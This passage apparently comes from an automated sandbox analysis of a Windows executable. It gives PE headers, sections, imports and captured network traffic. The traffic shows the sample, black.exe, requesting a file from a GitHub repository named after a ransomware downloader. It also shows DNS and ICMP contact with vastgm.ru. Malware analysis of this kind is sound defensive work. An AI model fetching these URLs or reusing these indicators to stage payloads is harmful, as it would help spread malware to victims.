                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x970.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x700000xe3bc0xe400bc9f91a29304eb418a66064e8181fb64False0.6335149396929824data6.778689555051379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x7f0000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                PNG0x706740xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                PNG0x711bc0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                RT_ICON0x727680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                RT_ICON0x72cd00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                RT_ICON0x735780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                RT_ICON0x744200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                RT_ICON0x748880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                RT_ICON0x759300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                RT_ICON0x77ed80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                RT_DIALOG0x7bc4c0x2badata0.5286532951289399
                                                RT_DIALOG0x7bf080x13adata0.6560509554140127
                                                RT_DIALOG0x7c0440xf2data0.71900826446281
                                                RT_DIALOG0x7c1380x14adata0.6
                                                RT_DIALOG0x7c2840x314data0.47588832487309646
                                                RT_DIALOG0x7c5980x24adata0.6279863481228669
                                                RT_STRING0x7c7e40x1fcdata0.421259842519685
                                                RT_STRING0x7c9e00x246data0.41924398625429554
                                                RT_STRING0x7cc280x1a6data0.514218009478673
                                                RT_STRING0x7cdd00xdcdata0.65
                                                RT_STRING0x7ceac0x470data0.3873239436619718
                                                RT_STRING0x7d31c0x164data0.5056179775280899
                                                RT_STRING0x7d4800x110data0.5772058823529411
                                                RT_STRING0x7d5900x158data0.4563953488372093
                                                RT_STRING0x7d6e80xe8data0.5948275862068966
                                                RT_STRING0x7d7d00x1c6data0.5242290748898678
                                                RT_STRING0x7d9980x268data0.4837662337662338
                                                RT_GROUP_ICON0x7dc000x68data0.7019230769230769
                                                RT_MANIFEST0x7dc680x753XML 1.0 document, ASCII text, with CRLF line terminators0.39786666666666665

                                                Imports

                                                DLLImport
                                                KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 9, 2024 07:03:43.521142006 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:43.640774012 CET804973020.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:43.640857935 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:43.643467903 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:43.762876987 CET804973020.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:45.094494104 CET804973020.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:45.096118927 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:45.096172094 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:45.096326113 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:45.106193066 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:45.106208086 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:45.139740944 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:46.733144045 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:46.733297110 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:46.738733053 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:46.738739967 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:46.739100933 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:46.795588017 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:46.843327045 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.694281101 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.694374084 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.694412947 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.694434881 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.694458961 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.694475889 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.694493055 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.694515944 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.699702024 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.712928057 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.712969065 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.713015079 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.713030100 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.713071108 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.721209049 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.764744997 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.878501892 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.882263899 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.882317066 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.882417917 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.882433891 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.882488966 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.890928030 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.901038885 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.901109934 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.901124954 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.908914089 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.908992052 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.908999920 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.916821003 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.916902065 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.916909933 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.924841881 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.924870968 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.924945116 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.924954891 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.925007105 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.932635069 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.940484047 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.940562963 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.940578938 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.940593004 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.940637112 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.948374987 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.956238031 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.956317902 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.956335068 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.964076996 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:47.964162111 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:47.964171886 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.014769077 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.062341928 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.070310116 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.070391893 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.070411921 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.073375940 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.073470116 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.073478937 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.079513073 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.079593897 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.079601049 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.088835955 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.088932037 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.088948965 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.088958025 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.089004993 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.094599962 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.100436926 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.100513935 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.100521088 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.106491089 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.106559038 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.106570959 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.111939907 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.112004042 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.112015963 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.117692947 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.117744923 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.117758989 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.123473883 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.123549938 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.123562098 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.129244089 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.129292965 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.129301071 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.140568018 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.140640974 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:03:48.140647888 CET4434973120.233.83.145192.168.2.4
                                                Dec 9, 2024 07:03:48.141205072 CET49731443192.168.2.420.233.83.145
                                                Dec 9, 2024 07:04:00.095634937 CET804973020.233.83.145192.168.2.4
                                                Dec 9, 2024 07:04:00.095794916 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:05:07.047285080 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:05:07.047305107 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:07.047379017 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:05:07.047559023 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:05:07.047569990 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:08.260246992 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:08.362853050 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:05:08.362884998 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:08.364104033 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:08.364120007 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:08.364187956 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:05:08.484380007 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:05:08.484555006 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:08.573370934 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:05:08.573399067 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:08.776489019 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:05:23.184171915 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:05:23.526534081 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:05:24.229654074 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:05:25.526705027 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:05:27.574373007 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:27.574461937 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:05:27.574558020 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:05:28.026695967 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:05:33.026599884 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:05:43.026597977 CET4973080192.168.2.420.233.83.145
                                                Dec 9, 2024 07:06:12.776721001 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:06:12.776751041 CET4434978569.192.108.223192.168.2.4
                                                Dec 9, 2024 07:06:57.870714903 CET49785443192.168.2.469.192.108.223
                                                Dec 9, 2024 07:06:57.870780945 CET4434978569.192.108.223192.168.2.4

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 9, 2024 07:03:43.373780012 CET6233253192.168.2.41.1.1.1
                                                Dec 9, 2024 07:03:43.510727882 CET53623321.1.1.1192.168.2.4
                                                Dec 9, 2024 07:03:43.536669970 CET5915453192.168.2.41.1.1.1
                                                Dec 9, 2024 07:03:44.108558893 CET53591541.1.1.1192.168.2.4
                                                Dec 9, 2024 07:05:08.934978962 CET5268953192.168.2.41.1.1.1

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Dec 9, 2024 07:03:44.119338989 CET192.168.2.4185.178.208.1904d5aEcho
                                                Dec 9, 2024 07:03:48.770092010 CET192.168.2.4185.178.208.1904d59Echo
                                                Dec 9, 2024 07:03:56.160629034 CET192.168.2.4185.178.208.1904d58Echo
                                                Dec 9, 2024 07:04:00.977262020 CET192.168.2.4185.178.208.1904d57Echo
                                                Dec 9, 2024 07:04:09.862446070 CET192.168.2.4185.178.208.1904d56Echo
                                                Dec 9, 2024 07:04:15.073781013 CET192.168.2.4185.178.208.1904d55Echo
                                                Dec 9, 2024 07:04:23.524650097 CET192.168.2.4185.178.208.1904d54Echo
                                                Dec 9, 2024 07:04:32.318049908 CET192.168.2.4185.178.208.1904d53Echo
                                                Dec 9, 2024 07:07:03.209980011 CET192.168.2.4185.178.208.1904d52Echo
                                                Dec 9, 2024 07:07:12.915436983 CET192.168.2.4185.178.208.1904d51Echo
                                                Dec 9, 2024 07:07:15.993057966 CET192.168.2.4185.178.208.1904d50Echo
                                                Dec 9, 2024 07:07:21.276700020 CET192.168.2.4185.178.208.1904d4fEcho
                                                Dec 9, 2024 07:07:24.274765968 CET192.168.2.4185.178.208.1904d4eEcho
                                                Dec 9, 2024 07:07:29.749423027 CET192.168.2.4185.178.208.1904d4dEcho
                                                Dec 9, 2024 07:07:32.258939028 CET192.168.2.4185.178.208.1904d4cEcho
                                                Dec 9, 2024 07:07:41.130366087 CET192.168.2.4185.178.208.1904d4bEcho
                                                Dec 9, 2024 07:07:48.962646961 CET192.168.2.4185.178.208.1904d4aEcho

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 9, 2024 07:03:43.373780012 CET192.168.2.41.1.1.10xc323Standard query (0)github.comA (IP address)IN (0x0001)false
                                                Dec 9, 2024 07:03:43.536669970 CET192.168.2.41.1.1.10x8745Standard query (0)vastgm.ruA (IP address)IN (0x0001)false
                                                Dec 9, 2024 07:05:08.934978962 CET192.168.2.41.1.1.10x8e2fStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 9, 2024 07:03:43.510727882 CET1.1.1.1192.168.2.40xc323No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                Dec 9, 2024 07:03:44.108558893 CET1.1.1.1192.168.2.40x8745No error (0)vastgm.ru185.178.208.190A (IP address)IN (0x0001)false
                                                Dec 9, 2024 07:05:09.151154995 CET1.1.1.1192.168.2.40x8e2fNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • github.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.44973020.233.83.145806360C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 9, 2024 07:03:43.643467903 CET126OUTGET /keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe HTTP/1.1
                                                Host: github.com
                                                Connection: Keep-Alive
                                                Dec 9, 2024 07:03:45.094494104 CET150INHTTP/1.1 301 Moved Permanently
                                                Content-Length: 0
                                                Location: https://github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.44973120.233.83.1454436360C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-09 06:03:46 UTC126OUTGET /keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe HTTP/1.1
                                                Host: github.com
                                                Connection: Keep-Alive
                                                2024-12-09 06:03:47 UTC442INHTTP/1.1 404 Not Found
                                                Server: GitHub.com
                                                Date: Mon, 09 Dec 2024 06:03:47 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                Cache-Control: no-cache
                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                X-Frame-Options: deny
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 0
                                                Referrer-Policy: no-referrer-when-downgrade
                                                2024-12-09 06:03:47 UTC3388INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                                2024-12-09 06:03:47 UTC280INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73
                                                Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns
                                                2024-12-09 06:03:47 UTC1370INData Raw: 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2d 63 6c 6f 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69
                                                Data Ascii: github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <li
